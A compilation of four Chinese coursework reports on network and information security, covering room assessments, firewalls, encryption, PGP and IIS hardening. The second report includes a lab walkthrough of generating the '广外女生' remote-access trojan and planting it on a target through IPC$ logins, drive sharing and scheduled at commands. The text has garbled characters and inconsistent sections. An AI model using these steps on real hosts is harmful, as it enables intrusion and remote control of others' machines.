第一篇:网络信息安全评估报告
计算机信息安全评估报告
如何
实
现
如
下
图
所
示
可用性1.人们通常采用一些技术措施或网络安全设备来实现这些目标。例如:
使用防火墙,把攻击者阻挡在网络外部,让他们“迚不来”。
即使攻击者迚入了网络内部,由于有加密机制,会使他们“改不了”和“拿不走”关 键信息和资源。
机密性2机密性将对敏感数据的访问权限控制在那些经授权的个人,只有他们才能查看数据。机密性可防止向未经授权的个人泄露信息,或防止信息被加工。
如图所示,“迚不来”和“看不懂”都实现了信息系统的机密性。
人们使用口令对迚入系统的用户迚行身份鉴别,非法用户没有口令就“迚不来”,这就保证了信息系统的机密性。
即使攻击者破解了口令,而迚入系统,加密机制也会使得他们“看不懂”关键信息。例如,甲给乙发送加密文件,只有乙通过解密才能读懂其内容,其他人看到的是乱码。由此便实现了信息的机密性。
完整性3如图所示,“改不了”和“拿不走”都实现了信息系统的完整性。使用加密机制,可以保证信息系统的完整性,攻击者无法对加密信息迚行修改或者复制。
不可抵赖性4如图所示,“跑不掉”就实现了信息系统的不可抵赖性。如果攻击者迚行了非法操作,系统管理员使用审计机制或签名机制也可让他们无所遁形
对考试的机房迚行“管理制度”评估。(1)评估说明
为规范管理,保障计算机设备的正常运行,创造良好的上机环境,必须制定相关的管理制度
(2)评估内容
没有建立相应信息系统运行管理规程、缺陷管理制度、统计汇报制度、运维流程、值班制度,没有实行工作票制度;机房出入管理制度上墙,但没有机房迚出情况记录(3)评估分析报告
所存在问题:1没有系统的相关负责人,机房也是谁人都可以自由出入。2在上机过程中做与学习无关的工作。3机房财产规划不健全等(4)评估建议
1、计算机室的管理由系统管理员负责,非机房工作人员未经允许不准迚入。未经许可不得擅自上机操作和对运行设备及各种配置迚行更改。
2、保持机房内清洁、安静,严禁机房内吸烟、吐痰以及大声喧哗;严禁将易燃、易爆、易污染和强磁物品带入机房。
3、机房内的一切物品,未经管理员同意,不得随意挪动,拆卸和带出机房。
4、上机时,应先认真检查机器情况,如有问题应及时向机房管理员反应。
5、上机人员不得在机房内迚行与上机考试无关的计算机操作。
6、上机时应按规定操作,故意或因操作不当造成设备损坏,除照价赔偿外,视情节轻重给予处罚。对考试的机房迚行“物理安全”评估。(1)评估说明
防火,防水,防尘,防腐蚀,主机房安装门禁、监控与报警系统。(2)评估内容 主机房没有安装门禁、监控系统,有消防报警系统。(3)评估分析报告
没有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路是分开的,机房没有配备应急照明装置,有定期对UPS的运行状况迚行检测但没有检测记录。
(4)评估建议
有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路分开,机房配备应急照明装置,定期对UPS的运行状况迚行检测(查看半年内检测记录)对考试的机房迚行“计算机系统安全”评估。(1)评估说明
应用系统的角色、权限分配有记录;用户账户的变更、修改、注销有记录(半年记录情况);关键应用系统的数据功能操作迚行审计幵迚行长期存储;对关键应用系统有应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前迚行安全性测试。
(2)评估内容
营销系统的角色、权限分配有记录,其余系统没有;用户账户的变更、修改、注销没有记录;关键应用系统的数据功能操作没有迚行审计;没有针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令有定期迚行变更;有些新系统上线前没有迚行过安全性测试。
(3)评估分析报告
网络中的防火墙位置部署合理,防火墙规则配置符合安全要求,防火墙规则配置的建立、更改有规范申请、审核、审批流程,对防火墙日志迚行存储、备份。
(4)评估建议
完善系统的角色、权限分配有记录;记录用户账户的变更、修改、注销(半年记录情况);关键应用系统的数据功能操作迚行审计;制定针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前应严格按照相关标准迚行安全性测试。
对考试的机房迚行“网络与通信安全”评估。(1)评估说明
按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。
(2)评估内容
没有部署身份认证系统、安全管理平台,没有漏洞扫描系统,重要系统没有迚行信息安全风险评估,没有部署针对安全设备的日志服务器。
(3)评估分析报告
按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。
(4)评估建议
部署身份认证系统、安全管理平台,采用漏洞扫描系统,重要系统一年内迚行信息安全风险评估,部署针对安全设备的日志服务器。
信息安全评估:
对考试的机房迚行“日志与统计安全”评估。(1)评估说明
每天计算机上机记录日志在册,对系统迚行不定时的还原。对本局半年内发生的较大的、或者发生次数较多的信息安全事件迚行汇总记录,形成本单位的安全事件列表
(2)评估内容
已成立了信息安全领导机构,但尚未成立信息安全工作机构。
(3)评估分析报告
局域网核心交换设备、城域网核心路由设备应采取设备冗余或准备备用设备,不允许外联链路绕过防火墙,具有当前准确的网络拓扑结构图
(4)评估建议
完善信息安全组织机构,成立信息安全工作机构。
第二篇:【企业网络】网络信息安全报告
XX中型企业网安全 网络信息安全报告
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
感谢老师对我们的教导。
第三篇:网络信息安全
网络信息安全
信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可缺少的信息交换工具。然而,由于计算机网络具有开放性、互联性、连接方式的多样性及终端分布的不均匀性,再加上本身存在的技术弱点和人为的疏忽,致使网络易受计算机病毒、黑客或恶意软件的侵害。面对侵袭网络安全的种种威胁,必须考虑信息的安全这个至关重要的问题。
网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全,即硬件平台、操作系统、应用软件;运行服务安全,即保证服务的连续性、高效率。信息安全则主要是指数据安全,包括数据加密、备份、程序等。
1.硬件安全。即网络硬件和存储媒体的安全。要保护这些硬设施不受损害,能够正常工作。
2.软件安全。即计算机及其网络中各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效,不被非法复制。
3.运行服务安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运行。
4.数据安全。即网络中存储及流通数据的女全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。
1.防火墙技术。防火墙(Firewall)是近年来发展的最重要的安全技术,它的主要功能是加强网络之间的访问控制,防止外部网络用户以非法手段通过外部网络进入内部网络(被保护网络)。它对两个或多个网络之间传输的数据包和链接方式按照一定的安全策略对其进行检查,来决定网络之间的通信是否被允许,并监视网络运行状态。简单防火墙技术可以在路由器上实现,而专用防火墙提供更加可靠的网络安全控制方法。
防火墙的安全策略有两条。一是“凡是未被准许的就是禁止的”。防火墙先是封闭所有信息流,然后审查要求通过的信息,符合条件的就让通过;二是“凡是未被禁止的就是允许的”,防火墙先是转发所有的信息,然后再逐项剔除有害的内容,被禁止的内容越多,防火墙的作用就越大。网络是动态发展的,安全策略的制定不应建立在静态的基础之上。在制定防火墙安全规则时,应符合“可适应性的安全管理”模型的原则,即:安全=风险分析+执行策略+系统实施+漏洞监测+实时响应。防火墙技术主要有以下三类:
●包过滤技术(Packct Filtering)。它一般用在网络层,主要根据防火墙系统所收到的每个数据包的源IP地址、目的IP地址、TCP/UDP源端口号、TCP/UDP目的端口号及数据包中的各种标志位来进行判定,根据系统设定的安全策略来决定是否让数据包通过,其核心就是安全策略,即过滤算法的设计。
●代理(Proxy)服务技术。它用来提供应用层服务的控制,起到外部网络向内部网络申请服务时的中间转接作用。内部网络只接受代理提出的服务请求,拒绝外部网络其它节点的直接请求。运行代理服务的主机被称为应用机关。代理服务还可以用于实施较强的数据流监控、过滤、记录等功能。
●状态监控(Statc Innspection)技术。它是一种新的防火墙技术。在网络层完成所有必要的防火墙功能——包过滤与网络服务代理。目前最有效的实现方法是采用 Check Point)提出的虚拟机方式(Inspect Virtual Machine)。
防火墙技术的优点很多,一是通过过滤不安全的服务,极大地提高网络安全和减少子网中主机的风险;二是可以提供对系统的访问控制;三是可以阻击攻击者获取攻击网络系统的有用信息;四是防火墙还可以记录与统计通过它的网络通信,提供关于网络使用的统计数据,根据统计数据来判断可能的攻击和探测;五是防火墙提供制定与执行网络安全策略的手段,它可以对企业内部网实现集中的安全管理。
防火墙技术的不足有三。一是防火墙不能防止绕过防火墙的攻击;二是防火墙经不起人为因素的攻击。由于防火墙对网络安全实施单点控制,因此可能受到黑客的攻击;三是防火墙不能保证数据的秘密性,不能对数据进行鉴别,也不能保证网络不受病毒的攻击。
2.加密技术。数据加密被认为是最可靠的安全保障形式,它可以从根本上满足信息完整性的要求,是一种主动安全防范策略。数据加密就是按照确定的密码算法将敏感的明文数据变换成难以识别的密文数据。通过使用不同的密钥,可用同一加密算法,将同一明文加密成不同的密文。当需要时可使用密钥将密文数据还原成明文数据,称为解密。
密钥加密技术分为对称密钥加密和非对称密钥加密两类。对称加密技术是在加密与解密过程中使用相同的密钥加以控制,它的保密度主要取决于对密钥的保密。它的特点是数字运算量小,加密速度快,弱点是密钥管理困难,一旦密钥泄露,将直接影响到信息的安全。非对称密钥加密法是在加密和解密过程中使用不同的密钥加以控制,加密密钥是公开的,解密密钥是保密的。它的保密度依赖于从公开的加密密钥或密文与明文的对照推算解密密钥在计算上的不可能性。算法的核心是运用一种特殊的数学函数——单向陷门函数,即从一个方向求值是容易的,但其逆向计算却很困难,从而在实际上成为不可能。
除了密钥加密技术外,还有数据加密技术。一是链路加密技术。链路加密是对通信线路加密;二是节点加密技术。节点加密是指对存储在节点内的文件和数据库信息进行的加密保护。
3.数字签名技术。数字签名(Digital Signature)技术是将摘要用发送者的私钥加密,与原文一起传送给接收者。接收者只有用发送者的公钥才能解密被加密的摘要。在电子商务安全保密系统中,数字签名技术有着特别重要的地位,在电子商务安全服务中的源鉴别、完整性服务、不可否认服务中都要用到数字签名技术。
在书面文件上签名是确认文件的一种手段,其作用有两点,一是因为自己的签名难以否认,从而确认文件已签署这一事实;二是因为签名不易仿冒,从而确定了文件是真的这一事实。数字签名与书面签名有相同相通之处,也能确认两点,一是信息是由签名者发送的,二是信息自签发后到收到为止未曾做过任何修改。这样,数字签名就可用来防止:电子信息因易于修改而有人作伪;冒用别人名义发送信息;发出(收到)信件后又加以否认。
广泛应用的数字签名方法有RSA签名、DSS签名和 Hash签名三种。RSA的最大方便是没有密钥分配问题。公开密钥加密使用两个不同的密钥,其中一个是公开的,另一个是保密的。公开密钥可以保存在系统目录内、未加密的电子邮件信息中、电话黄页上或公告牌里,网上的任何用户都可获得公开密钥。保密密钥是用户专用的,由用户本身持有,它可以对公开密钥加密的信息解密。DSS数字签名是由美国政府颁布实施的,主要用于跟美国做生意的公司。它只是一个签名系统,而且美国不提倡使用任何削弱政府窃听能力的加密软件。Hash签名是最主要的数字签名方法,跟单独签名的RSA数字签名不同,它是将数字签名和要发送的信息捆在一起,所以更适合电子商务。
4.数字时间戳技术。在电子商务交易的文件中,时间是十分重要的信息,是证明文件有效性的主要内容。在签名时加上一个时间标记,即有数字时间戳(Digita Timestamp)的数字签名方案:验证签名的人或以确认签名是来自该小组,却不知道是小组中的哪一个人签署的。指定批准人签名的真实性,其他任何人除了得到该指定人或签名者本人的帮助,否则不能验证签名
(二)网络信忽安全的目标
1.保密性。保密性是指信息不泄露给非授权人、实休和过程,或供其使用的特性。
2.完整性。完整性是指信息未经授权不能被修改、不被破坏、不被插人、不迟延、不乱序和不丢失的特性。对网络信息安全进行攻击的最终目的就是破坏信息的完整性。
3.可用性。可用性是指合法用户访问并能按要求顺序使用信息的特性,即保证合法用户在需要时可以访问到信息
4.可控性。可控性是指授权机构对信息的内容及传播具有控制的能力的特性,可以控制授权范围内的信息流向以及方式。
5.可审查性。在信息交流过程结束后,通信双方不能抵赖曾经做出的行为,也不能否认曾经接收到对方的信息。
网络信息安全面临的问题
1.网络协议和软件的安全缺陷
因特网的基石是TCP/IP协议簇,该协议簇在实现上力求效率,而没有考虑安全因素,因为那样无疑增大代码量,从而降低了TCP/IP的运行效率,所以说TCP/IP本身在设计上就是不安全的。很容易被窃听和欺骗:大多数因特网上的流量是没有加密的,电子邮件口令、文件传输很容易被监听和劫持。很多基于TCP/IP的应用服务都在不同程度上存在着安全问题,这很容易被一些对TCP/IP十分了解的人所利用,一些新的处于测试阶级的服务有更多的安全缺陷。缺乏安全策略:许多站点在防火墙配置上无意识地扩大了访问权限,忽视了这些权限可能会被内部人员滥用,黑客从一些服务中可以获得有用的信息,而网络维护人员却不知道应该禁止这种服务。配置的复杂性:访问控制的配置一般十分复杂,所以很容易被错误配置,从而给黑客以可乘之机。TCP/IP是被公布于世的,了解它的人越多被人破坏的可能性越大。现在,银行之间在专用网上传输数据所用的协议都是保密的,这样就可以有效地防止入侵。当然,人们不能把TCP/IP和其实现代码保密,这样不利于TCP/IP网络的发展。2.黑客攻击手段多样
进人2006年以来,网络罪犯采用翻新分散式阻断服务(DDOS)攻击的手法,用形同互联网黄页的域名系统服务器来发动攻击,扰乱在线商务。宽带网络条件下,常见的拒绝服务攻击方式主要有两种,一是网络黑客蓄意发动的针对服务和网络设备的DDOS攻击;二是用蠕虫病毒等新的攻击方式,造成网络流量急速提高,导致网络设备崩溃,或者造成网络链路的不堪负重。
调查资料显示,2006年初发现企业的系统承受的攻击规模甚于以往,而且来源不是被绑架的“僵尸”电脑,而是出自于域名系统(DNS)服务器。一旦成为DDOS攻击的目标,目标系统不论是网页服务器、域名服务器,还是电子邮件服务器,都会被网络上四面八方的系统传来的巨量信息给淹没。黑客的用意是借人量垃圾信息妨碍系统正常的信息处理,借以切断攻击目标对外的连线。黑客常用“僵尸”电脑连成网络,把大量的查询要求传至开放的DNS服务器,这些查询信息会假装成被巨量信息攻击的目标所传出的,因此DNS服务器会把回应信息传到那个网址。
美国司法部的一项调查资料显示,1998年3月到2005年2月期间,82%的人侵者掌握授权用户或设备的数据。在传统的用户身份认证环境下,外来攻击者仅凭盗取的相关用户身份凭证就能以任何台设备进人网络,即使最严密的用户认证保护系统也很难保护网络安全。另外,由于企业员工可以通过任何一台未经确认和处理的设备,以有效合法的个人身份凭证进入网络,使间谍软件、广告软件、木马程序及其它恶意程序有机可乘,严重威胁网络系统的安全。
有资料显示,最近拉美国家的网络诈骗活动增多,作案手段先进。犯罪活动已经从“现实生活转入虚拟世界”,网上诈骗活动日益增多。3.计算机病毒
第四篇:网络信息安全实训报告
西安航空职业技术学院
课 程 设 计 任 务 书
课题名称:网络与信息安全实训
设计内容: 1.文档的加密 2.网络服务器的安全配置 3.数据
备份与恢复 4.网络安全防护 5.应用安全
技术条件或要求:1.掌握常用的加密算法原理;会使用加密软件对文件、文件夹或邮件进行加密。2.掌握FTP服务器及客户端的配置;Web服务安全。3.掌握数据备份的方法;会使用数据恢复软件进行数据恢复。用FileGee备份数据。4.掌握用sniffer捕获数据包,用sniffer实时监测网络。5.能用天网防火墙防范木马;用天网防火墙打开21和80端口。6.数字证书作用;支付宝数字证书的申请、安装与取消;USB Key的使用。
指导教师(签名): 教研室主任(签名):
开题日期: 2015 年 6 月 29 日 完成日期: 2015 年 7 月 03 日
摘 要
随着计算机技术的不断发展,计算机网络已经成为信息时代的重要特征,人们称它为信息高速公路。网络是计算机技术和通信技术的产物,是应社会对信息共享和信息传递的要求发展起来的,各国都在建设自己的信息高速公路。我国近年来计算机网络发展的速度也很快,在国防、电信、银行、广播等方面都有广泛的应用。
我相信在不长的时间里,计算机网络一定会得到极大的发展,那时将全面进入信息时代。不当正因为网络应用的如此广泛,又在生活中扮演很重要的角色,所以其安全性是不容忽视的,它是网络能否经历考验的关键,如果安全性不好会给人们带来很多麻烦。网络信息交流现已是生活中必不可少的一个环节,然而信息安全却得不到相应的重视。本文针对网络信息安全技术进行的探讨。
关键词:计算机技术;网络信息;安全性;信息安全 目录
1.文档的加密........................................................................................................................................1 1.1对称加密工具APOCALYPSO的使用.................................................................................................1 1.2 PGP软件的使用...........................................................................................................................2
1.2.1 PGP软件的介绍....................................................................................................2 1.2.2 PGP软件的安装....................................................................................................3 1.2.3 PGP软件的秘钥生成............................................................................................4 1.2.4 PGP软件的邮件加密解密....................................................................................5
2.网络服务器的安全配置....................................................................................................................6 2.1 安装IIS6.0.................................................................................................................................6
2.1.1安装Internet 信息服务.....................................................................................6 2.1.2配置匿名身份验证................................................................................................7 2.2 基本 WEB 站点配置......................................................................................................................8 2.3让IIS以最小的NTFS权限运行.................................................................................................8
3.数据备份和恢复................................................................................................................................9 3.1FILEGEE软件.................................................................................................................................9
3.1.1FileGee软件介绍..............................................................................................9 3.1.2 FileGee软件使用..........................................................................................10 4.网络安全防护..................................................................................................................................12 4.1 SNIFFERPRO数据包捕获与协议分析...........................................................................................12
4.1.1实验原理..............................................................................................................12 4.1.2基本的网络数据帧的捕获和解码......................................................................12 4.2 天网防火墙的使用.....................................................................................................................14
5.应用安全..........................................................................................................................................17 5.1支付宝数字证书.........................................................................................................................17 5.2 USB KEY的使用........................................................................................................................18 总结........................................................................................................................................................19 参考文献................................................................................................................................................19
1.文档的加密
1.1对称加密工具Apocalypso的使用
⑴打开此软件进入主界面
图-主界面
⑵选择此软件
图-密钥以及文件选择界面
⑷完成加密
图-完成加密界面
1.2 PGP软件的使用
1.2.1 PGP软件的介绍
PGP软件的英文全名是“Pretty Good Privacy”,是一个广泛用于电子邮件和其他场合的十分出色的加密软件。PGP实现了大部分加密和认证的算法,如Blowfish,CAST,DES,IDEA,RC2,RC4,RC5,Safer,Safer-SK等
传统的加密方法,以及MD2,MD4,MD5,RIPEMD-160,SHA等散列算法,当然也包括D-H,DSA,Elgamal,RSA等公开密钥加密算法。PGP先进的加密技术使它成为最好的、攻击成本最高的安全性程序 1.2.2 PGP软件的安装
⑴选择用户类型,首次安装选择No, I’m a New User
图-选择用户类型
⑵确认安装的路径选择安装应用组件
图-安装PGP—选择应用组件
⑶安装完毕后,重新启动计算机;重启后,PGP Desktop已安装在电脑上安装向导会继续PGP Desktop注册,填写注册码及相关信息,完成安装。
图—填写注册信息
1.2.3 PGP软件的秘钥生成
⑴打开Open PGP Desktop,在菜单中选择PGPKeys,在 Key Generation Winzrad提示向导下,创建用户密钥对。
图-PGP密钥生成向导
⑵输入用户名及邮件地址
图-输入用户名及邮箱
⑶输入用户保护私钥口令,完成秘钥生成。
图-输入用户保护私钥口令
1.2.4 PGP软件的邮件加密解密
⑴打开Outlook Express,填写好邮件内容后,选择Outlook 工具栏菜单中的PGP 加密图标,使用用户公钥加密邮件内容
图-选择加密邮件
⑵发送加密邮件
图-加密后的邮件 ⑶收到邮件打开后,选中加密邮件后选择复制,打开Open PGP Desktop,在菜单中选择PGPmail,在PGPmail中选择解密/效验,在弹出的“选择文件并解密/效验”对话框中选择剪贴板,将要解密的邮件内容复制到剪贴板中。
图-解密邮件
⑷输入用户保护私钥口令后,邮件被解密还原。
图-输入用户保护私钥口令
2.网络服务器的安全配置
2.1 安装IIS6.0 2.1.1安装Internet 信息服务
Microsoft Internet 信息服务(IIS)是与 Windows Server 2003 集成的 Web 服务。要安装
IIS、添加可选组件或删除可选组件,请按以下步骤操作: ⑴单击开始,指向控制面板,然后单击“添加或删除程序”。“添加或删除程序”工具就会启动。
⑵单击添加/删除 Windows 组件。显示“Windows 组件向导”。⑶在Windows 组件 列表中,单击Web 应用程序服务器。⑷单击详细信息,然后单击Internet 信息服务(IIS)。⑸.单击详细信息,以查看 IIS 可选组件列表。
⑹选择您要安装的可选组件。默认情况下,下列组件是选中的:---公用文件
---FrontPage 2002 Server Extentions---Internet 信息服务管理单元---Internet 信息服务管理器---NNTP 服务---SMTP 服务
---World Wide Web 服务
⑺单击“World Wide Web 服务”,然后单击详细信息,以查看 IIS 可选子组件(如 Active Server Pages 组件和“远程管理(HTML)工具”)的列表。选择您要安装的可选子组件。默认情况下,下列组件是选中的:
---World Wide Web 服务
⑻单击确定,直到返回“Windows 组件向导”。⑼单击下一步,然后完成“Windows 组件向导”。2.1.2配置匿名身份验证
要配置匿名身份验证,请按以下步骤操作:
⑴单击开始,指向管理工具,然后单击Internet 信息服务(IIS)。⑵展开“* 服务器名称”(其中服务器名称为该服务器的名称),右键单击Web 站点,然后单击属性。
⑶在Web 站点属性对话框中,单击目录安全性选项卡。⑷在“身份验证和访问控制”下,单击编辑。⑸单击“启用匿名访问”复选框,将其选中。备注:“用户名”框中的用户帐户只用于通过Windows Guest帐户进行匿名访问。默认情况下,服务器会创建并使用帐户IUSR_computername。匿名用户帐户密码仅在Windows中使用;匿名用户不使用用户名和密码登录。
⑹在“已验证身份的访问”下,单击“集成的 Windows 身份验证”复选框,将其选中。
⑺单击确定两次。
2.2 基本 Web 站点配置
⑴单击开始,指向管理工具,然后单击Internet 信息服务(IIS)。⑵展开“* 服务器名称”(其中服务器名称为该服务器的名称),然后展开Web 站点。
⑶右键单击默认Web站点,然后单击属性。
⑷单击Web站点选项卡。如果您已为计算机分配了多个IP地址,则请在IP地址框中单击您要指定给此Web站点的IP地址。
⑸单击性能选项卡。使用Web站点属性-性能对话框可设置影响内存、带宽使用和Web连接数量的属性。
通过配置某个特定站点上的网络带宽,您可以更好地控制该站点的通信量。例如,通过在低优先级的 Web 站点上限制带宽,您可以放宽对他站点的访问量的限制。同样,当您指定到某个 Web 站点的连接数量时,您就可以为其他站点释放资源。设置是站点专用的,应根据网络通信量和使用变化情况进行调整。
---单击“限制可用于此 Web 站点的带宽”复选框,将其选中,可配置 IIS 将网络带宽调节到选定的最大带宽量,以千字节每秒(KB/S)为单位。
---单击Web 服务连接 复选框,将其选中,可选择特定数目或者不限定数目的 Web 服务连接。限制连接可使计算机资源能够用于其他进程。
备注:每个浏览 Web 站点的客户机通常都使用大约三个连接。⑹单击主目录 选项卡。
---如果您想使用存储在本地计算机上的Web内容,则单击“此计算机上的目录”然后在本地路径框中键入您想要的路径。例如,默认路径为
C:Inetpubwww.xiexiebang.common files:
everyone:读取及运行,列出文件目录,读取(允许将来自父系的可
继承性权限传播给对象)⑶inetpubwww.xiexiebang.compressed files、offline web pages、system32、tasks、temp、web以外的所有目录去除“允许将来自父系的可继承性权限传播给对象”选框,复制。
⑹ windows:everyone:读取及运行,列出文件目录,读取(允许将来自父系的可继承性权限传播给对象)
⑺windowstemp:(允许访问数据库并显示在asp页面上)everyone:修改(允许将来自父系的可继承性权限传播给对象)再单独对cmd.exe、net.exe、net1.exe、ping.exe、netstat.exe、ftp.exe、tftp.exe、telnet.exe、regedit.exe、at.exe、attrib.exe、format.exe设置为只允许administrators组访问,这样就可以防范通过Serv-U的本地提升权限漏洞来运行这些关键的程序了,再删除cacls.exe这个程序,防止有人通过命令行来修改权限还比较有威胁的组件就是Shell.Application和Wscript.Shell这两个组件了,Shell.Application可以对文件进行一些操作,还可以执行程序,但不能带参数,而Wscript.Shell可以操作注册表和执行DOS命令。
3.数据备份和恢复
3.1FileGee软件
3.1.1FileGee软件介绍
